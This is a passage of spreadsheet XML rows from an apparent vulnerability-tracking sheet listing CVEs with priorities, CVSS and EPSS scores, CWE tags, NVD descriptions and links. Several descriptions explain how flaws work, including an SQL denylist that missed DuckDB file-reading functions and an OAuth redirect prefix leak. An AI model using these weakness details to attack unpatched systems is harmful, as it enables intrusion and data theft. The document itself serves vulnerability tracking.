      <c r="S583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2021-48007</t>
        </is>
      </c>
    </row>
    <row r="584">
      <c r="A584" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B584" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C584" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-51014</t>
        </is>
      </c>
      <c r="D584" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E584" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F584" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G584" s="5" t="inlineStr"/>
      <c r="H584" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I584" s="5" t="inlineStr"/>
      <c r="J584" s="5" t="inlineStr"/>
      <c r="K584" s="5" t="inlineStr"/>
      <c r="L584" s="5" t="inlineStr"/>
      <c r="M584" s="5" t="inlineStr"/>
      <c r="N584" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O584" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P584" s="5" t="inlineStr"/>
      <c r="Q584" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R584" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 4.0.7 contains an unhandled exception vulnerability in the ModalFormResponsePacket handler when processing malformed JSON from clients. Attackers can send specially crafted form response packets with invalid JSON to trigger an uncaught InvalidArgumentException, causing server crashes.</t>
        </is>
      </c>
      <c r="S584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-51014</t>
        </is>
      </c>
    </row>
    <row r="585">
      <c r="A585" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B585" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C585" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54396</t>
        </is>
      </c>
      <c r="D585" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E585" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F585" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G585" s="5" t="inlineStr"/>
      <c r="H585" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I585" s="5" t="inlineStr"/>
      <c r="J585" s="5" t="inlineStr"/>
      <c r="K585" s="5" t="inlineStr"/>
      <c r="L585" s="5" t="inlineStr"/>
      <c r="M585" s="5" t="inlineStr"/>
      <c r="N585" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O585" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P585" s="5" t="inlineStr"/>
      <c r="Q585" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="R585" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 4.8.1 fail to validate dye color IDs in banner NBT data during deserialization. Attackers can provide invalid color values in inventory transactions or via commands to trigger undefined offset errors and crash the server.</t>
        </is>
      </c>
      <c r="S585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54396</t>
        </is>
      </c>
    </row>
    <row r="586">
      <c r="A586" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B586" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C586" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71417</t>
        </is>
      </c>
      <c r="D586" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E586" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F586" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G586" s="5" t="inlineStr"/>
      <c r="H586" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I586" s="5" t="inlineStr"/>
      <c r="J586" s="5" t="inlineStr"/>
      <c r="K586" s="5" t="inlineStr"/>
      <c r="L586" s="5" t="inlineStr"/>
      <c r="M586" s="5" t="inlineStr"/>
      <c r="N586" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O586" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P586" s="5" t="inlineStr"/>
      <c r="Q586" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R586" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 5.32.1 fails to validate uniqueness of pack UUIDs in ResourcePackClientResponsePacket STATUS_SEND_PACKS handling, allowing authenticated clients to trigger duplicate pack transmissions. Attackers can send multiple copies of valid pack UUIDs in a single packet to exhaust server memory and cause denial of service.</t>
        </is>
      </c>
      <c r="S586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71417</t>
        </is>
      </c>
    </row>
    <row r="587">
      <c r="A587" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B587" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17627</t>
        </is>
      </c>
      <c r="D587" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E587" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F587" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G587" s="5" t="inlineStr"/>
      <c r="H587" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I587" s="5" t="inlineStr"/>
      <c r="J587" s="5" t="inlineStr"/>
      <c r="K587" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L587" s="5" t="inlineStr"/>
      <c r="M587" s="5" t="inlineStr"/>
      <c r="N587" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O587" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P587" s="5" t="inlineStr"/>
      <c r="Q587" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R587" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.2 could allow a remote authenticated attacker to obtain sensitive information and inject messages into workflow history due to improper authorization.</t>
        </is>
      </c>
      <c r="S587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17627</t>
        </is>
      </c>
    </row>
    <row r="588">
      <c r="A588" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B588" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21100</t>
        </is>
      </c>
      <c r="D588" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E588" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F588" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G588" s="5" t="inlineStr"/>
      <c r="H588" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I588" s="5" t="inlineStr"/>
      <c r="J588" s="5" t="inlineStr"/>
      <c r="K588" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L588" s="5" t="inlineStr"/>
      <c r="M588" s="5" t="inlineStr"/>
      <c r="N588" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O588" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P588" s="5" t="inlineStr"/>
      <c r="Q588" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R588" s="5" t="inlineStr">
        <is>
          <t>Improper access control in SystemUI prior to SMR Sep-2026 Release 1 allows local attackers to launch arbitrary activity.</t>
        </is>
      </c>
      <c r="S588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21100</t>
        </is>
      </c>
    </row>
    <row r="589">
      <c r="A589" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B589" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30865</t>
        </is>
      </c>
      <c r="D589" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E589" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F589" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G589" s="5" t="inlineStr"/>
      <c r="H589" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I589" s="5" t="inlineStr"/>
      <c r="J589" s="5" t="inlineStr"/>
      <c r="K589" s="5" t="inlineStr"/>
      <c r="L589" s="5" t="inlineStr"/>
      <c r="M589" s="5" t="inlineStr"/>
      <c r="N589" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O589" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P589" s="5" t="inlineStr"/>
      <c r="Q589" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R589" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, there is a Reflected Cross-Site Scripting (XSS) vulnerability in the dashboard save functionality. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30865</t>
        </is>
      </c>
    </row>
    <row r="590">
      <c r="A590" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B590" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35445</t>
        </is>
      </c>
      <c r="D590" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E590" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F590" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G590" s="5" t="inlineStr"/>
      <c r="H590" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I590" s="5" t="inlineStr"/>
      <c r="J590" s="5" t="inlineStr"/>
      <c r="K590" s="5" t="inlineStr"/>
      <c r="L590" s="5" t="inlineStr"/>
      <c r="M590" s="5" t="inlineStr"/>
      <c r="N590" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O590" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P590" s="5" t="inlineStr"/>
      <c r="Q590" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R590" s="5" t="inlineStr">
        <is>
          <t>Winter CMS is a content management system built on the Laravel PHP framework. In versions prior to 1.2.13, the backend did not validate the handler name submitted through the form postback _handler POST field, allowing an authenticated backend user to invoke arbitrary controller methods, including protected, private, and action-prefixed ones. While AJAX requests validate that handler names match the on[A-Z][\w+]* pattern, the postback path passed the submitted _handler value straight to the handler dispatcher with no such check, so any controller that exposes a public action or conditionally relaxes its $requiredPermissions check could be reached, bypassing the roles and permissions system. The built-in Users controller was affected because it set $requiredPermissions to null for the myaccount action, letting any authenticated backend user invoke user-management methods such as update_onDelete and update_onManualPasswordReset without holding the backend.manage_users permission. This issue is fixed in version 1.2.13.</t>
        </is>
      </c>
      <c r="S590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35445</t>
        </is>
      </c>
    </row>
    <row r="591">
      <c r="A591" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B591" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38821</t>
        </is>
      </c>
      <c r="D591" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E591" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F591" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G591" s="5" t="inlineStr"/>
      <c r="H591" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I591" s="5" t="inlineStr"/>
      <c r="J591" s="5" t="inlineStr"/>
      <c r="K591" s="5" t="inlineStr"/>
      <c r="L591" s="5" t="inlineStr"/>
      <c r="M591" s="5" t="inlineStr"/>
      <c r="N591" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O591" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P591" s="5" t="inlineStr"/>
      <c r="Q591" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R591" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow vulnerability exists in openNDS before 11.0.0 that allows an unauthenticated attacker on the captive portal network to crash the openNDS daemon (denial of service) and potentially achieve remote code execution. This is in http_microhttpd.c.</t>
        </is>
      </c>
      <c r="S591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38821</t>
        </is>
      </c>
    </row>
    <row r="592">
      <c r="A592" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B592" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47735</t>
        </is>
      </c>
      <c r="D592" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E592" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F592" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G592" s="5" t="inlineStr"/>
      <c r="H592" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I592" s="5" t="inlineStr"/>
      <c r="J592" s="5" t="inlineStr"/>
      <c r="K592" s="5" t="inlineStr"/>
      <c r="L592" s="5" t="inlineStr"/>
      <c r="M592" s="5" t="inlineStr"/>
      <c r="N592" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O592" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P592" s="5" t="inlineStr"/>
      <c r="Q592" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-22, CWE-918</t>
        </is>
      </c>
      <c r="R592" s="5" t="inlineStr">
        <is>
          <t>Arc is an open, SQL-native time-series database for telemetry. Prior to version 26.06.1, Arc's user-SQL validator (`internal/api/query.go:ValidateSQLRequest`) blocked only `read_parquet(` and `arc_partition_agg(` via regex denylist. The broader DuckDB I/O function family — `read_csv_auto`, `read_csv`, `read_json`, `read_json_auto`, `read_text`, `read_blob`, `glob`, `parquet_metadata`, `parquet_schema`, `read_xlsx`, etc. — was not blocked. RBAC table-reference extraction inspected only `FROM`/`JOIN` clauses, so scalar table functions in the `SELECT` list slipped past both layers. This is fixed in 2026.06.1 via a structural sandbox at the DuckDB layer. After lockdown, DuckDB refuses to open any file outside the allowlist and refuses further `INSTALL`/`LOAD`. Already-loaded extensions remain callable. Some workarounds are available. Restrict API access to known-trusted networks via firewall rules or, as a temporary mitigation, add `read_csv*`/`read_json*`/`glob` etc. to `dangerousSQLPattern` in `internal/api/query.go`.</t>
        </is>
      </c>
      <c r="S592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47735</t>
        </is>
      </c>
    </row>
    <row r="593">
      <c r="A593" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B593" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49249</t>
        </is>
      </c>
      <c r="D593" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E593" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F593" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G593" s="5" t="inlineStr"/>
      <c r="H593" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I593" s="5" t="inlineStr"/>
      <c r="J593" s="5" t="inlineStr"/>
      <c r="K593" s="5" t="inlineStr"/>
      <c r="L593" s="5" t="inlineStr"/>
      <c r="M593" s="5" t="inlineStr"/>
      <c r="N593" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O593" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P593" s="5" t="inlineStr"/>
      <c r="Q593" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R593" s="5" t="inlineStr">
        <is>
          <t>Boruta is a standalone authorization server that aims to implement OAuth 2.0 and Openid Connect up to decentralized identity specifications. Prior to version 0.10.0, BorutaIdentityWeb.UserSettingsController.update/2 atomizes every key of the user-supplied request body via String.to_atom/1 before any validation. Because String.to_atom interns atoms permanently in the BEAM atom table (default cap 1,048,576 atoms; ERL_MAX_ATOMS), any authenticated end user can send PUT /users/settings with a user[&lt;fresh-key&gt;]=... body containing fresh keys per request and exhaust the global VM atom table. Once the table is full, the BEAM aborts with no more index entries in atom_tab and the entire OIDC server (auth, admin, gateway apps in the umbrella) crashes. The route is protected only by require_authenticated_user and a per-IP rate limit of 10 requests/second; a logged-in end user can hit it. The keys are atomized unconditionally before the downstream Accounts.update_user/6 call, so even failing updates contribute to exhaustion. This issue has been patched in version 0.10.0.</t>
        </is>
      </c>
      <c r="S593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49249</t>
        </is>
      </c>
    </row>
    <row r="594">
      <c r="A594" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B594" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49315</t>
        </is>
      </c>
      <c r="D594" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E594" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F594" s="5" t="inlineStr">
        <is>
          <t>psirt@huawei.com</t>
        </is>
      </c>
      <c r="G594" s="5" t="inlineStr"/>
      <c r="H594" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I594" s="5" t="inlineStr"/>
      <c r="J594" s="5" t="inlineStr"/>
      <c r="K594" s="5" t="inlineStr"/>
      <c r="L594" s="5" t="inlineStr"/>
      <c r="M594" s="5" t="inlineStr"/>
      <c r="N594" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O594" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P594" s="5" t="inlineStr"/>
      <c r="Q594" s="5" t="inlineStr">
        <is>
          <t>CWE-264</t>
        </is>
      </c>
      <c r="R594" s="5" t="inlineStr">
        <is>
          <t>DoS vulnerability in the input device module.
Impact: Successful exploitation of this vulnerability may affect availability.</t>
        </is>
      </c>
      <c r="S594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49315</t>
        </is>
      </c>
    </row>
    <row r="595">
      <c r="A595" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B595" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50165</t>
        </is>
      </c>
      <c r="D595" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E595" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F595" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G595" s="5" t="inlineStr"/>
      <c r="H595" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I595" s="5" t="inlineStr"/>
      <c r="J595" s="5" t="inlineStr"/>
      <c r="K595" s="5" t="inlineStr"/>
      <c r="L595" s="5" t="inlineStr"/>
      <c r="M595" s="5" t="inlineStr"/>
      <c r="N595" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O595" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P595" s="5" t="inlineStr"/>
      <c r="Q595" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R595" s="5" t="inlineStr">
        <is>
          <t>alf.io is an open source ticket reservation system for conferences, trade shows, workshops, and meetups. An Improper Access Control issue in versions prior to 2.0-M5-2605 allows an organization owner to read system-level configuration secrets through organization/event scoped "single configuration" endpoints. The affected endpoints require organization or event ownership, but they accept an arbitrary configuration key and then return the first matching value from a lookup that includes system-level configuration. As a result, an organization owner can retrieve secrets intended to be administrator-only, including the system API key when it is configured. Version 2.0-M5-2605 fixes the issue.</t>
        </is>
      </c>
      <c r="S595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50165</t>
        </is>
      </c>
    </row>
    <row r="596">
      <c r="A596" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B596" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53532</t>
        </is>
      </c>
      <c r="D596" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E596" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F596" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G596" s="5" t="inlineStr"/>
      <c r="H596" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I596" s="5" t="inlineStr"/>
      <c r="J596" s="5" t="inlineStr"/>
      <c r="K596" s="5" t="inlineStr"/>
      <c r="L596" s="5" t="inlineStr"/>
      <c r="M596" s="5" t="inlineStr"/>
      <c r="N596" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O596" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P596" s="5" t="inlineStr"/>
      <c r="Q596" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R596" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. In versions 3.4.0 through 3.4.12, a crafted HTJ2K-compressed EXR file causes an unconditional process abort in any application that calls exr_start_read() on untrusted input, resulting in denial of service. The crash is triggered by a QCD marker whose lower five bits are zero, which OpenEXR passes into the vendored OpenJPH library while constructing the codestream and evaluating its quantization delta parameters. OpenJPH uses an assertion rather than a recoverable error to validate those bits, so any invalid value calls abort() directly and cannot be intercepted by surrounding error handling, a problem compounded by OpenEXR wrapping only its internal HT header parser in error handling while leaving the later codestream read and construction calls unprotected. This issue has been resolved in version 3.4.13.</t>
        </is>
      </c>
      <c r="S596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53532</t>
        </is>
      </c>
    </row>
    <row r="597">
      <c r="A597" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B597" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53728</t>
        </is>
      </c>
      <c r="D597" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E597" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F597" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G597" s="5" t="inlineStr"/>
      <c r="H597" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I597" s="5" t="inlineStr"/>
      <c r="J597" s="5" t="inlineStr"/>
      <c r="K597" s="5" t="inlineStr"/>
      <c r="L597" s="5" t="inlineStr"/>
      <c r="M597" s="5" t="inlineStr"/>
      <c r="N597" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O597" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P597" s="5" t="inlineStr"/>
      <c r="Q597" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-601</t>
        </is>
      </c>
      <c r="R597" s="5" t="inlineStr">
        <is>
          <t>Medplum is a developer platform that enables development of healthcare apps. Prior to version 5.1.6, the external identity provider callback at GET /auth/external accepts attacker-controlled redirect URIs that only need to start with a registered client redirect URI, rather than matching exactly. After a successful external IdP login, the server appends Medplum login and code values to that attacker-supplied URL and issues a redirect. Because the external login request state is serialized as raw JSON and later trusted by the callback, an attacker who can tamper with state.redirectUri can cause Medplum to redirect authorization artifacts to an attacker-controlled endpoint. When the registered redirect URI is a bare origin or another prefix that can be extended into a different hostname, this becomes a cross-origin authorization code leak. This issue has been patched in version 5.1.6.</t>
        </is>
      </c>
      <c r="S597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53728</t>
        </is>
      </c>
    </row>
    <row r="598">
      <c r="A598" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B598" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55066</t>
        </is>
      </c>
      <c r="D598" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E598" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F598" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G598" s="5" t="inlineStr"/>
      <c r="H598" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I598" s="5" t="inlineStr"/>
      <c r="J598" s="5" t="inlineStr"/>
      <c r="K598" s="5" t="inlineStr"/>
      <c r="L598" s="5" t="inlineStr"/>
      <c r="M598" s="5" t="inlineStr"/>
      <c r="N598" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O598" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P598" s="5" t="inlineStr"/>
      <c r="Q598" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R598" s="5" t="inlineStr">
        <is>
          <t>Vikunja is an open-source self-hosted task management platform. Prior to 2.4.0, POST /api/v1/projects/{project}/views/{view}/buckets/{bucket}/tasks accepts a body supplied task_id but TaskBucket.CanUpdate in pkg/models/kanban_task_bucket.go authorizes only the project, view, and bucket from the URL. updateTaskBucket then calls Task.ReadOne without a separate task permission check, returns the victim task contents, and can update the task done state when the attacker chooses a done bucket. Because task identifiers are global sequential values, an authenticated user can enumerate cross-tenant tasks and modify their completion metadata through both the v1 and v2 routes that share this model. This issue is fixed in version 2.4.0.</t>
        </is>
      </c>
      <c r="S598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55066</t>
        </is>
      </c>
    </row>
    <row r="599">
      <c r="A599" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B599" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55520</t>
        </is>
      </c>
      <c r="D599" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E599" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F599" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G599" s="5" t="inlineStr"/>
      <c r="H599" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I599" s="5" t="inlineStr"/>
      <c r="J599" s="5" t="inlineStr"/>
      <c r="K599" s="5" t="inlineStr"/>
      <c r="L599" s="5" t="inlineStr"/>
      <c r="M599" s="5" t="inlineStr"/>
      <c r="N599" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O599" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P599" s="5" t="inlineStr"/>
      <c r="Q599" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
